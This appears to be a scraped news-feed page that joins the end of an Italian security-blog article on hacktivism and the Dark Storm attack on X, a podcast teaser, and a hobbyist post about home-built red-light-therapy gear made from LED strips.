Gli hacktivisti – ci racconta Jesse Williams – si fondano su diversi principi chiave come denunciare ed esporre la corruzione e gli illeciti, combattere la censura e difendere la privacy digitale, supportare le comunità emarginate e quelle oppresse (cruciale) e contrastare la propaganda e la disinformazione (azione vitale). Il modo in cui gli hacktivisti agiscono su questi principi rivela il loro vero impegno nei loro confronti e allo stesso tempo alcune ideologie possono essere distorte per servire come strumenti di controllo.
Il paradosso è che la ricerca dell’idealismo può talvolta rispecchiare la stessa oppressione che gli hacktivisti mirano a smantellare, intrappolando infine le persone all’interno del sistema che cercano di liberare. McGraw ha un legame personale con questo movimento: durante il suo percorso di hacking, l’hacktivismo ha svolto un ruolo fondamentale. Tuttavia, ci dice che se avesse saputo allora ciò che sa ora, il suo percorso sarebbe stato diverso.
Una fonte di ispirazione per un cambiamento significativo: il più grande hack di tutti
Mentre l’attacco di Dark Storm era guidato da motivazioni geopolitiche, prendendo di mira entità percepite come sostenitori di Israele, mentre X è utilizzato da molti sostenitori pro-palestinesi: l’attacco così paradossalmente ha messo a tacere le voci che sostenevano la loro causa. Come potrebbe finire: le azioni volte a sfidare gli oppressori percepiti possono inavvertitamente danneggiare coloro che intendono sostenere. L’hacktivismo contemporaneo nello sfidare le vere strutture di potere è limitato e necessita di azioni più incisive che vadano oltre i gesti simbolici e invece prendano di mira le cause profonde dei problemi sistemici.
“[…] l’hack che tutti stavamo aspettando in questo momento non è digitale ma ideologico”. _ Jesse William McGraw
Jesse William consiglia alla nuova generazione di iniziare ad ascoltare i testi di Zack de la Rocha da Rage Against the Machine come fonte di profonda ispirazione per un cambiamento significativo. La vera libertà implica il riconoscimento e la liberazione da questo controllo ideologico, piuttosto che impegnarsi in atti superficiali di resistenza. Questa consapevolezza è vista come il “più grande hack” di tutti.
L'articolo Oltre l’attacco di Dark Storm su X: come l’illusione dell’hacktivismo rinforza il sistema proviene da il blog della sicurezza informatica.
DK 9x22 Il bue dà del cornuto all'asino
È disperante quando le istituzioni esibiscono le stesse dinamiche deibambini dell'asilo...
spreaker.com/episode/dk-9x22-i…
DIY Your Own Red Light Therapy Gear
There are all kinds of expensive beauty treatments on the market — various creams, zappy lasers, and fine mists of heavily-refined chemicals. For [Ruth Amos], a $78,000 LED bed had caught her eye, and she wondered if she could recreate the same functionality on the cheap.
The concept behind [Ruth]’s build is simple enough. Rather than buy a crazy-expensive off-the-shelf beauty product, she decided to just buy equivalent functional components: a bunch of cheap red LEDs. Then, all she had to do was build these into a facemask and loungewear set to get the same supposed skin improving benefits at much lower cost.
[Ruth] started her build with a welding mask, inside which she fitted red LED strips of the correct wavelength for beneficial skin effects. She then did the same with an over-sized tracksuit, lacing it with an array of LED strips to cover as much of the body as possible. While it’s unlikely she was able to achieve the same sort of total body coverage as a full-body red light bed, nor was it particularly comfortable—her design cost a lot less—on the order of $100 or so.
Of course, you might question the light therapy itself. We’re not qualified to say whether or not red LEDs will give you better skin, but it’s not the first time we’ve seen a DIY attempt at light therapy.
youtube.com/embed/4ZCb4rtJzpo?…